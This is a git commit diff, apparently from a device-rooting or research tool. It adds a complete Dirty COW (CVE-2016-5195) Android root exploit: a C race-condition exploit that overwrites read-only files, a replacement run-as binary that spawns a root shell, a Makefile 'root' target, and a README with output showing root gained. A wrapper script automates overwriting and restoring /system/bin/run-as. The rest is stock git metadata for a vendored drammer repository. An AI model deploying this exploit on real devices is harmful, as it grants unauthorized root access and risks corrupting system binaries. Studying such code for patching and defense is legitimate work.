  1 +0000000000000000000000000000000000000000 fe0e2d64979f690600ea3f55cfc15a1ef9370845 Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1483574132 +0100 clone: from https://github.com/timwr/CVE-2016-5195.git
... ...
exploits/CVE-2016-5195/.git-disabled/logs/refs/heads/master 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/logs/refs/heads/master
  1 +0000000000000000000000000000000000000000 fe0e2d64979f690600ea3f55cfc15a1ef9370845 Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1483574132 +0100 clone: from https://github.com/timwr/CVE-2016-5195.git
... ...
exploits/CVE-2016-5195/.git-disabled/logs/refs/remotes/origin/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/logs/refs/remotes/origin/HEAD
  1 +0000000000000000000000000000000000000000 fe0e2d64979f690600ea3f55cfc15a1ef9370845 Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1483574132 +0100 clone: from https://github.com/timwr/CVE-2016-5195.git
... ...
exploits/CVE-2016-5195/.git-disabled/objects/pack/pack-fd6ad10a65d7118e4f67c5dd2bf8c285e1255172.idx 0 → 100644
View file @1d685ae
No preview for this file type
exploits/CVE-2016-5195/.git-disabled/objects/pack/pack-fd6ad10a65d7118e4f67c5dd2bf8c285e1255172.pack 0 → 100644
View file @1d685ae
No preview for this file type
exploits/CVE-2016-5195/.git-disabled/packed-refs 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/packed-refs
  1 +# pack-refs with: peeled fully-peeled
  2 +fe0e2d64979f690600ea3f55cfc15a1ef9370845 refs/remotes/origin/master
  3 +50a356af6fb5d0aed3ea24fb34ed2a0f812fe2c7 refs/remotes/origin/oldcow
... ...
exploits/CVE-2016-5195/.git-disabled/refs/heads/master 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/refs/heads/master
  1 +fe0e2d64979f690600ea3f55cfc15a1ef9370845
... ...
exploits/CVE-2016-5195/.git-disabled/refs/remotes/origin/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.git-disabled/refs/remotes/origin/HEAD
  1 +ref: refs/remotes/origin/master
... ...
exploits/CVE-2016-5195/.gitignore 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/.gitignore
  1 +# files for diffutils
  2 +*.orig
  3 +*.rej
  4 +
  5 +# built application files
  6 +*.apk
  7 +*.ap_
  8 +
  9 +# files for the dex VM
  10 +*.dex
  11 +
  12 +# Java class files
  13 +*.class
  14 +
  15 +# generated files
  16 +bin/
  17 +gen/
  18 +libs/
  19 +obj/
  20 +
  21 +# Local configuration file (sdk path, etc)
  22 +local.properties
  23 +build.prop
  24 +build.prop.bak
  25 +
  26 +# Eclipse project files
  27 +.classpath
  28 +.project
... ...
exploits/CVE-2016-5195/Android.mk 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/Android.mk
  1 +LOCAL_PATH := $(call my-dir)
  2 +
  3 +include $(CLEAR_VARS)
  4 +
  5 +LOCAL_SRC_FILES := \
  6 + dirtycow.c \
  7 + dcow.c
  8 +
  9 +LOCAL_MODULE := dirtycow
  10 +LOCAL_LDFLAGS += -llog
  11 +LOCAL_CFLAGS += -DDEBUG
  12 +
  13 +include $(BUILD_EXECUTABLE)
  14 +
  15 +include $(CLEAR_VARS)
  16 +LOCAL_MODULE := run-as
  17 +LOCAL_SRC_FILES := \
  18 + dirtycow.c \
  19 + run-as.c
  20 +LOCAL_CFLAGS += -DDEBUG
  21 +LOCAL_LDFLAGS += -llog
  22 +
  23 +include $(BUILD_EXECUTABLE)
  24 +
... ...
exploits/CVE-2016-5195/Makefile 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/Makefile
  1 +
  2 +ARCH := $(shell adb shell getprop ro.product.cpu.abi)
  3 +SDK_VERSION := $(shell adb shell getprop ro.build.version.sdk)
  4 +
  5 +all: build
  6 +
  7 +build:
  8 + ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=$(ARCH) APP_PLATFORM=android-$(SDK_VERSION)
  9 +
  10 +push: build
  11 + adb push libs/$(ARCH)/dirtycow /data/local/tmp/dcow
  12 +
  13 +test: push
  14 + adb push test.sh /data/local/tmp/test.sh
  15 + adb shell 'chmod 777 /data/local/tmp/dcow'
  16 + adb shell 'chmod 777 /data/local/tmp/test.sh'
  17 + adb shell '/data/local/tmp/test.sh'
  18 + adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
  19 + adb shell 'cat /data/local/tmp/test2'
  20 + adb shell 'cat /data/local/tmp/test2' | xxd
  21 +
  22 +root: push
  23 + adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
  24 + adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
  25 + adb shell /system/bin/run-as
  26 +
  27 +clean:
  28 + rm -rf libs
  29 + rm -rf obj
  30 +
... ...
exploits/CVE-2016-5195/README.md 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/README.md
  1 +# CVE-2016-5195
  2 +CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android
  3 +
  4 +This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB.
  5 +It does not disable SELinux (see https://github.com/timwr/CVE-2016-5195/issues/9) or install superuser on the device.
  6 +
  7 +```
  8 +
  9 +$ make root
  10 +ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
  11 +make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195'
  12 +[arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow
  13 +[arm64-v8a] Install : run-as => libs/arm64-v8a/run-as
  14 +[x86_64] Install : dirtycow => libs/x86_64/dirtycow
  15 +[x86_64] Install : run-as => libs/x86_64/run-as
  16 +[mips64] Install : dirtycow => libs/mips64/dirtycow
  17 +[mips64] Install : run-as => libs/mips64/run-as
  18 +[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
  19 +[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
  20 +[armeabi] Install : dirtycow => libs/armeabi/dirtycow
  21 +[armeabi] Install : run-as => libs/armeabi/run-as
  22 +[x86] Install : dirtycow => libs/x86/dirtycow
  23 +[x86] Install : run-as => libs/x86/run-as
  24 +[mips] Install : dirtycow => libs/mips/dirtycow
  25 +[mips] Install : run-as => libs/mips/run-as
  26 +make[1]: Leaving directory '/home/user/dev/git/exploits/CVE-2016-5195'
  27 +adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
  28 +[100%] /data/local/tmp/dcow
  29 +adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
  30 +[100%] /data/local/tmp/run-as
  31 +adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
  32 +dcow /data/local/tmp/run-as /system/bin/run-as
  33 +warning: new file size (17944) and file old size (5544) differ
  34 +
  35 +[*] size 5544
  36 +[*] mmap 0xb536b000
  37 +[*] currently 0xb536b000=464c457f
  38 +[*] madvise = 0xb536b000 5544
  39 +[*] madvise = 0 0
  40 +[*] /proc/self/mem 5544 1
  41 +[*] exploited 0xb536b000=464c457f
  42 +adb shell /system/bin/run-as
  43 +uid /system/bin/run-as 2000
  44 +uid 0
  45 +0 u:r:runas:s0
  46 +context 0 u:r:shell:s0
  47 +/system/bin/sh: can't find tty fd: No such device or address
  48 +/system/bin/sh: warning: won't have full job control
  49 +shamu:/ # id
  50 +uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
  51 +shamu:/ #
  52 +
  53 +```
... ...
exploits/CVE-2016-5195/dcow.c 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/dcow.c
  1 +#include <err.h>
  2 +#include <dlfcn.h>
  3 +#include <stdio.h>
  4 +#include <fcntl.h>
  5 +#include <stdlib.h>
  6 +#include <string.h>
  7 +#include <unistd.h>
  8 +#include <limits.h>
  9 +#include <pthread.h>
  10 +#include <sys/mman.h>
  11 +#include <sys/stat.h>
  12 +#include <sys/wait.h>
  13 +#include <sys/types.h>
  14 +
  15 +#ifdef DEBUG
  16 +#include <android/log.h>
  17 +#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
  18 +#elif PRINT
  19 +#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
  20 +#else
  21 +#define LOGV(...)
  22 +#endif
  23 +
  24 +extern int dcow(int argc, const char *argv[]);
  25 +
  26 +int main(int argc, const char *argv[])
  27 +{
  28 + return dcow(argc, argv);
  29 +}
0 30 \ No newline at end of file
... ...
exploits/CVE-2016-5195/dirtycow.c 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/dirtycow.c
  1 +#include <err.h>
  2 +#include <dlfcn.h>
  3 +#include <stdio.h>
  4 +#include <fcntl.h>
  5 +#include <stdlib.h>
  6 +#include <string.h>
  7 +#include <unistd.h>
  8 +#include <limits.h>
  9 +#include <pthread.h>
  10 +#include <sys/mman.h>
  11 +#include <sys/stat.h>
  12 +#include <sys/wait.h>
  13 +#include <sys/types.h>
  14 +
  15 +#ifdef DEBUG
  16 +#include <android/log.h>
  17 +#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
  18 +#elif PRINT
  19 +#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
  20 +#else
  21 +#define LOGV(...)
  22 +#endif
  23 +
  24 +#define LOOP 0x100000
  25 +#define TIMEOUT 10
  26 +
  27 +struct mem_arg {
  28 + void *offset;
  29 + void *patch;
  30 + off_t patch_size;
  31 + const char *fname;
  32 + volatile int stop;
  33 + int success;
  34 +};
  35 +
  36 +static void *checkThread(void *arg) {
  37 + struct mem_arg *mem_arg;
  38 + mem_arg = (struct mem_arg *)arg;
  39 + struct stat st;
  40 + int i;
  41 + char * newdata = malloc(mem_arg->patch_size);
  42 + for(i = 0; i < TIMEOUT && !mem_arg->stop; i++) {
  43 + int f=open(mem_arg->fname, O_RDONLY);
  44 + if (f == -1) {
  45 + LOGV("could not open %s", mem_arg->fname);
  46 + break;
  47 + }
  48 + if (fstat(f,&st) == -1) {
  49 + LOGV("could not stat %s", mem_arg->fname);
  50 + close(f);
  51 + break;
  52 + }
  53 + read(f, newdata, mem_arg->patch_size);
  54 + close(f);
  55 +
  56 + int memcmpret = memcmp(newdata, mem_arg->patch, mem_arg->patch_size);
  57 + if (memcmpret == 0) {
  58 + mem_arg->stop = 1;
  59 + mem_arg->success = 1;
  60 + return 0;
  61 + }
  62 + usleep(100 * 1000);
  63 + }
  64 + mem_arg->stop = 1;
  65 + return 0;
  66 +}
  67 +static void *madviseThread(void *arg)
  68 +{
  69 + struct mem_arg *mem_arg;
  70 + size_t size;
  71 + void *addr;
  72 + int i, c = 0;
  73 +
  74 + mem_arg = (struct mem_arg *)arg;
  75 + size = mem_arg->patch_size;
  76 + addr = (void *)(mem_arg->offset);
  77 +
  78 + LOGV("[*] madvise = %p %zd", addr, size);
  79 +
  80 + for(i = 0; i < LOOP && !mem_arg->stop; i++) {
  81 + c += madvise(addr, size, MADV_DONTNEED);
  82 + }
  83 +
  84 + LOGV("[*] madvise = %d %d", c, i);
  85 + mem_arg->stop = 1;
  86 + return 0;
  87 +}
  88 +
  89 +static void *procselfmemThread(void *arg)
  90 +{
  91 + struct mem_arg *mem_arg;
  92 + int fd, i, c = 0;
  93 + mem_arg = (struct mem_arg *)arg;
  94 + unsigned char *p = mem_arg->patch;
  95 +
  96 + fd = open("/proc/self/mem", O_RDWR);
  97 + if (fd == -1) {
  98 + LOGV("open(\"/proc/self/mem\"");
  99 + }
  100 +
  101 + for (i = 0; i < LOOP && !mem_arg->stop; i++) {
  102 + lseek(fd, (off_t)mem_arg->offset, SEEK_SET);
  103 + c += write(fd, p, mem_arg->patch_size);
  104 + }
  105 +
  106 + LOGV("[*] /proc/self/mem %d %i", c, i);
  107 +
  108 + close(fd);
  109 +
  110 + mem_arg->stop = 1;
  111 + return NULL;
  112 +}
  113 +
  114 +static void exploit(struct mem_arg *mem_arg)
  115 +{
  116 + pthread_t pth1, pth2, pth3;
  117 +
  118 + LOGV("[*] currently %p=%lx", (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
  119 +
  120 + mem_arg->stop = 0;
  121 + mem_arg->success = 0;
  122 + pthread_create(&pth3, NULL, checkThread, mem_arg);
  123 + pthread_create(&pth1, NULL, madviseThread, mem_arg);
  124 + pthread_create(&pth2, NULL, procselfmemThread, mem_arg);
  125 +
  126 + pthread_join(pth3, NULL);
  127 + pthread_join(pth1, NULL);
  128 + pthread_join(pth2, NULL);
  129 +
  130 + LOGV("[*] exploited %p=%lx", (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
  131 +}
  132 +
  133 +int dcow(int argc, const char * argv[])
  134 +{
  135 + if (argc < 2) {
  136 + LOGV("usage %s /data/local/tmp/default.prop /default.prop", argv[0]);
  137 + return 0;
  138 + }
  139 +
  140 + const char * fromfile = argv[1];
  141 + const char * tofile = argv[2];
  142 + LOGV("dcow %s %s", fromfile, tofile);
  143 +
  144 + struct mem_arg mem_arg;
  145 + struct stat st;
  146 + struct stat st2;
  147 +
  148 + int f = open(tofile, O_RDONLY);
  149 + if (f == -1) {
  150 + LOGV("could not open %s", tofile);
  151 + return -1;
  152 + }
  153 + if (fstat(f,&st) == -1) {
  154 + LOGV("could not stat %s", tofile);
  155 + return 1;
  156 + }
  157 +
  158 + int f2=open(fromfile, O_RDONLY);
  159 + if (f2 == -1) {
  160 + LOGV("could not open %s", fromfile);
  161 + return 2;
  162 + }
  163 + if (fstat(f2,&st2) == -1) {
  164 + LOGV("could not stat %s", fromfile);
  165 + return 3;
  166 + }
  167 +
  168 + size_t size = st2.st_size;
  169 + if (st2.st_size != st.st_size) {
  170 + LOGV("warning: new file size (%lld) and destination file size (%lld) differ\n", (unsigned long long)st2.st_size, (unsigned long long)st.st_size);
  171 + if (st2.st_size > st.st_size) {
  172 + LOGV("corruption?\n");
  173 + }
  174 + }
  175 +
  176 + LOGV("[*] size %zd", size);
  177 + mem_arg.patch = malloc(size);
  178 + if (mem_arg.patch == NULL) {
  179 + return 4;
  180 + }
  181 +
  182 + mem_arg.patch_size = size;
  183 + mem_arg.fname = argv[2];
  184 +
  185 + read(f2, mem_arg.patch, size);
  186 + close(f2);
  187 +
  188 + /*read(f, mem_arg.unpatch, st.st_size);*/
  189 +
  190 + void * map = mmap(NULL, size, PROT_READ, MAP_PRIVATE, f, 0);
  191 + if (map == MAP_FAILED) {
  192 + LOGV("mmap");
  193 + return 5;
  194 + }
  195 +
  196 + LOGV("[*] mmap %p", map);
  197 +
  198 + mem_arg.offset = map;
  199 +
  200 + exploit(&mem_arg);
  201 +
  202 + close(f);
  203 + // to put back
  204 + /*exploit(&mem_arg, 0);*/
  205 + if (mem_arg.success == 0) {
  206 + return -1;
  207 + }
  208 +
  209 + return 0;
  210 +}
0 211 \ No newline at end of file
... ...
exploits/CVE-2016-5195/run-as.c 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/run-as.c
  1 +#include <unistd.h>
  2 +#include <stdio.h>
  3 +#include <stdlib.h>
  4 +#include <string.h>
  5 +#include <errno.h>
  6 +
  7 +#include <dlfcn.h>
  8 +#include <fcntl.h>
  9 +
  10 +#ifdef DEBUG
  11 +#include <android/log.h>
  12 +#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
  13 +#elif PRINT
  14 +#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
  15 +#else
  16 +#define LOGV(...)
  17 +#endif
  18 +
  19 +//reduce binary size
  20 +char __aeabi_unwind_cpp_pr0[0];
  21 +
  22 +typedef int getcon_t(char ** con);
  23 +typedef int setcon_t(const char* con);
  24 +
  25 +extern int dcow(int argc, const char *argv[]);
  26 +
  27 +int main(int argc, const char **argv)
  28 +{
  29 + //LOGV("uid %s %d", argv[0], getuid());
  30 +
  31 + if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {
  32 + LOGV("setresgid/setresuid failed");
  33 + }
  34 +
  35 + //LOGV("uid %d", getuid());
  36 +
  37 + dlerror();
  38 +#ifdef __aarch64__
  39 + void * selinux = dlopen("/system/lib64/libselinux.so", RTLD_LAZY);
  40 +#else
  41 + void * selinux = dlopen("/system/lib/libselinux.so", RTLD_LAZY);
  42 +#endif
  43 + if (selinux) {
  44 + void * getcon = dlsym(selinux, "getcon");
  45 + const char *error = dlerror();
  46 + if (error) {
  47 + LOGV("dlsym error %s", error);
  48 + } else {
  49 + getcon_t * getcon_p = (getcon_t*)getcon;
  50 + char * secontext;
  51 + int ret = (*getcon_p)(&secontext);
  52 + //LOGV("%d %s", ret, secontext);
  53 + void * setcon = dlsym(selinux, "setcon");
  54 + const char *error = dlerror();
  55 + if (error) {
  56 + LOGV("dlsym setcon error %s", error);
  57 + } else {
  58 + setcon_t * setcon_p = (setcon_t*)setcon;
  59 + ret = (*setcon_p)("u:r:shell:s0");
  60 + ret = (*getcon_p)(&secontext);
  61 + //LOGV("context %d %s", ret, secontext);
  62 + }
  63 + }
  64 + dlclose(selinux);
  65 + } else {
  66 + //LOGV("no selinux?");
  67 + }
  68 +
  69 + system("/system/bin/sh -i");
  70 +
  71 +}
... ...
exploits/CVE-2016-5195/test.sh 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/CVE-2016-5195/test.sh
  1 +
  2 +if [ -f /data/local/tmp/test ]; then
  3 + chmod 777 /data/local/tmp/test
  4 + rm /data/local/tmp/test
  5 +fi
  6 +
  7 +if [ -f /data/local/tmp/test2 ]; then
  8 + chmod 777 /data/local/tmp/test2
  9 + rm /data/local/tmp/test2
  10 +fi
  11 +
  12 +echo vulnerable!!!!!!! > /data/local/tmp/test
  13 +echo yournotvulnerable > /data/local/tmp/test2
  14 +
  15 +chmod 444 /data/local/tmp/test2
  16 +ls -l /data/local/tmp/test*
  17 +
... ...
android_run_root_shell @ 23f7d701b26
  1 +++ a/exploits/android_run_root_shell
  1 +Subproject commit 23f7d701b26a29ef636c0229bb7e184781912d2e
... ...
exploits/cve-2016-5195.sh 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/cve-2016-5195.sh
  1 +NDK_PATH="/home/imanol/devel/android-sdk/ndk-bundle"
  2 +
  3 +function pre_cve_2016_5195()
  4 +{
  5 + local ARCH=$(adb -s $1 shell getprop ro.product.cpu.abi | tr -d '\r')
  6 + local SDK_VERSION=$(adb -s $1 shell getprop ro.build.version.sdk | tr -d '\r')
  7 + pushd exploits/CVE-2016-5195 > /dev/null
  8 + PATH=$PATH:$NDK_PATH
  9 + ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=$ARCH APP_PLATFORM=android-$SDK_VERSION &> /dev/null
  10 + adb -s $1 push libs/$ARCH/dirtycow /data/local/tmp/dcow &> /dev/null
  11 + adb -s $1 push libs/$ARCH/run-as /data/local/tmp/run-as &> /dev/null
  12 + popd > /dev/null
  13 +}
  14 +
  15 +function cve_2016_5195()
  16 +{
  17 + local rootcmd="adb -s $1 shell run-as | tail -n +3"
  18 + adb -s $1 shell cp -a /system/bin/run-as /data/local/tmp/run-as_orig &> /dev/null
  19 + adb -s $1 pull /system/bin/run-as dump/$1/run-as &> /dev/null
  20 + adb -s $1 shell "/data/local/tmp/stat -c \"%u:%g %a\" /system/bin/run-as" &> dump/$1/run-as_stat
  21 + md5sum dump/$1/run-as &> dump/$1/run-as.md5
  22 + adb -s $1 shell /data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as &> /dev/null
  23 + local USERID=$(echo '/data/local/tmp/id -u;exit' | eval "$rootcmd" 2> /dev/null | tr -d $'\r')
  24 + if [[ "$USERID" == "0" ]]; then
  25 + #exploit successful
  26 + echo "$rootcmd"
  27 + else
  28 + #exploit failed
  29 + return 1
  30 + fi
  31 + return 0
  32 +}
  33 +
  34 +function post_cve_2016_5195()
  35 +{
  36 + local rootcmd="adb -s $1 shell run-as | tail -n +6"
  37 + local overwrite=0
  38 + adb -s $1 shell /data/local/tmp/dcow /data/local/tmp/run-as_orig /system/bin/run-as &> /dev/null
  39 +
  40 + # Check 1: If root is still possible
  41 + local USERID=$(echo '/data/local/tmp/id -u;exit' | eval "$rootcmd" 2> /dev/null | tr -d $'\r')
  42 + if [[ "$USERID" == "0" ]]; then
  43 + echo "ERROR: UID still 0!!"
  44 + overwrite=1
  45 + fi
  46 + # Check 2: Hashes
  47 + local ORIGHASH="$(echo $(adb -s $1 shell md5sum /data/local/tmp/run-as_orig) | cut -d' ' -f 1)"
  48 + local CURRENTHASH="$(echo $(adb -s $1 shell md5sum /system/bin/run-as) | cut -d' ' -f 1)"
  49 + if [[ "$ORIGHASH" != "$CURRENTHASH" ]]; then
  50 + echo "ERROR: MD5 checksum mismatch!!"
  51 + overwrite=1
  52 + fi
  53 +
  54 + if [[ $overwrite == 1 ]]; then
  55 + # A message you never want to see..."
  56 + echo "CRITICAL: /system/bin/run-as has been POSSIBLY overwritten. In that case, manual recovery WILL be necessary. Do NOT reboot the phone under any circumstances if you don't know how to proceed and exercise caution. /data/local/tmp/dcow and /data/local/tmp/run-as_orig will be preserved, along the copy in the dump folder. May God help you."
  57 + fi
  58 +
  59 + adb -s $1 shell rm /data/local/tmp/run-as &> /dev/null
  60 + if [[ $overwrite == 0 ]]; then
  61 + adb -s $1 shell rm /data/local/tmp/dcow &> /dev/null
  62 + adb -s $1 shell rm /data/local/tmp/run-as_orig &> /dev/null
  63 + fi
  64 +}
... ...
exploits/drammer/.git-disabled/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/HEAD
  1 +ref: refs/heads/master
... ...
exploits/drammer/.git-disabled/config 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/config
  1 +[core]
  2 + repositoryformatversion = 0
  3 + filemode = true
  4 + bare = false
  5 + logallrefupdates = true
  6 +[remote "origin"]
  7 + url = https://github.com/vusec/drammer
  8 + fetch = +refs/heads/*:refs/remotes/origin/*
  9 +[branch "master"]
  10 + remote = origin
  11 + merge = refs/heads/master
... ...
exploits/drammer/.git-disabled/description 0 → 100644
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/description
  1 +Unnamed repository; edit this file 'description' to name the repository.
... ...
exploits/drammer/.git-disabled/hooks/applypatch-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/applypatch-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to check the commit log message taken by
  4 +# applypatch from an e-mail message.
  5 +#
  6 +# The hook should exit with non-zero status after issuing an
  7 +# appropriate message if it wants to stop the commit. The hook is
  8 +# allowed to edit the commit message file.
  9 +#
  10 +# To enable this hook, rename this file to "applypatch-msg".
  11 +
  12 +. git-sh-setup
  13 +commitmsg="$(git rev-parse --git-path hooks/commit-msg)"
  14 +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"}
  15 +:
... ...
exploits/drammer/.git-disabled/hooks/commit-msg.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/commit-msg.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to check the commit log message.
  4 +# Called by "git commit" with one argument, the name of the file
  5 +# that has the commit message. The hook should exit with non-zero
  6 +# status after issuing an appropriate message if it wants to stop the
  7 +# commit. The hook is allowed to edit the commit message file.
  8 +#
  9 +# To enable this hook, rename this file to "commit-msg".
  10 +
  11 +# Uncomment the below to add a Signed-off-by line to the message.
  12 +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg
  13 +# hook is more suited to it.
  14 +#
  15 +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p')
  16 +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1"
  17 +
  18 +# This example catches duplicate Signed-off-by lines.
  19 +
  20 +test "" = "$(grep '^Signed-off-by: ' "$1" |
  21 + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || {
  22 + echo >&2 Duplicate Signed-off-by lines.
  23 + exit 1
  24 +}
... ...
exploits/drammer/.git-disabled/hooks/post-update.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/post-update.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to prepare a packed repository for use over
  4 +# dumb transports.
  5 +#
  6 +# To enable this hook, rename this file to "post-update".
  7 +
  8 +exec git update-server-info
... ...
exploits/drammer/.git-disabled/hooks/pre-applypatch.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/pre-applypatch.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to verify what is about to be committed
  4 +# by applypatch from an e-mail message.
  5 +#
  6 +# The hook should exit with non-zero status after issuing an
  7 +# appropriate message if it wants to stop the commit.
  8 +#
  9 +# To enable this hook, rename this file to "pre-applypatch".
  10 +
  11 +. git-sh-setup
  12 +precommit="$(git rev-parse --git-path hooks/pre-commit)"
  13 +test -x "$precommit" && exec "$precommit" ${1+"$@"}
  14 +:
... ...
exploits/drammer/.git-disabled/hooks/pre-commit.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/pre-commit.sample
  1 +#!/bin/sh
  2 +#
  3 +# An example hook script to verify what is about to be committed.
  4 +# Called by "git commit" with no arguments. The hook should
  5 +# exit with non-zero status after issuing an appropriate message if
  6 +# it wants to stop the commit.
  7 +#
  8 +# To enable this hook, rename this file to "pre-commit".
  9 +
  10 +if git rev-parse --verify HEAD >/dev/null 2>&1
  11 +then
  12 + against=HEAD
  13 +else
  14 + # Initial commit: diff against an empty tree object
  15 + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904
  16 +fi
  17 +
  18 +# If you want to allow non-ASCII filenames set this variable to true.
  19 +allownonascii=$(git config --bool hooks.allownonascii)
  20 +
  21 +# Redirect output to stderr.
  22 +exec 1>&2
  23 +
  24 +# Cross platform projects tend to avoid non-ASCII filenames; prevent
  25 +# them from being added to the repository. We exploit the fact that the
  26 +# printable range starts at the space character and ends with tilde.
  27 +if [ "$allownonascii" != "true" ] &&
  28 + # Note that the use of brackets around a tr range is ok here, (it's
  29 + # even required, for portability to Solaris 10's /usr/bin/tr), since
  30 + # the square bracket bytes happen to fall in the designated range.
  31 + test $(git diff --cached --name-only --diff-filter=A -z $against |
  32 + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0
  33 +then
  34 + cat <<\EOF
  35 +Error: Attempt to add a non-ASCII file name.
  36 +
  37 +This can cause problems if you want to work with people on other platforms.
  38 +
  39 +To be portable it is advisable to rename the file.
  40 +
  41 +If you know what you are doing you can disable this check using:
  42 +
  43 + git config hooks.allownonascii true
  44 +EOF
  45 + exit 1
  46 +fi
  47 +
  48 +# If there are whitespace errors, print the offending file names and fail.
  49 +exec git diff-index --check --cached $against --
... ...
exploits/drammer/.git-disabled/hooks/pre-push.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/pre-push.sample
  1 +#!/bin/sh
  2 +
  3 +# An example hook script to verify what is about to be pushed. Called by "git
  4 +# push" after it has checked the remote status, but before anything has been
  5 +# pushed. If this script exits with a non-zero status nothing will be pushed.
  6 +#
  7 +# This hook is called with the following parameters:
  8 +#
  9 +# $1 -- Name of the remote to which the push is being done
  10 +# $2 -- URL to which the push is being done
  11 +#
  12 +# If pushing without using a named remote those arguments will be equal.
  13 +#
  14 +# Information about the commits which are being pushed is supplied as lines to
  15 +# the standard input in the form:
  16 +#
  17 +# <local ref> <local sha1> <remote ref> <remote sha1>
  18 +#
  19 +# This sample shows how to prevent push of commits where the log message starts
  20 +# with "WIP" (work in progress).
  21 +
  22 +remote="$1"
  23 +url="$2"
  24 +
  25 +z40=0000000000000000000000000000000000000000
  26 +
  27 +while read local_ref local_sha remote_ref remote_sha
  28 +do
  29 + if [ "$local_sha" = $z40 ]
  30 + then
  31 + # Handle delete
  32 + :
  33 + else
  34 + if [ "$remote_sha" = $z40 ]
  35 + then
  36 + # New branch, examine all commits
  37 + range="$local_sha"
  38 + else
  39 + # Update to existing branch, examine new commits
  40 + range="$remote_sha..$local_sha"
  41 + fi
  42 +
  43 + # Check for WIP commit
  44 + commit=`git rev-list -n 1 --grep '^WIP' "$range"`
  45 + if [ -n "$commit" ]
  46 + then
  47 + echo >&2 "Found WIP commit in $local_ref, not pushing"
  48 + exit 1
  49 + fi
  50 + fi
  51 +done
  52 +
  53 +exit 0
... ...
exploits/drammer/.git-disabled/hooks/pre-rebase.sample 0 → 100755
  View file @1d685ae
  1 +++ a/exploits/drammer/.git-disabled/hooks/pre-rebase.sample
  1 +#!/bin/sh
  2 +#
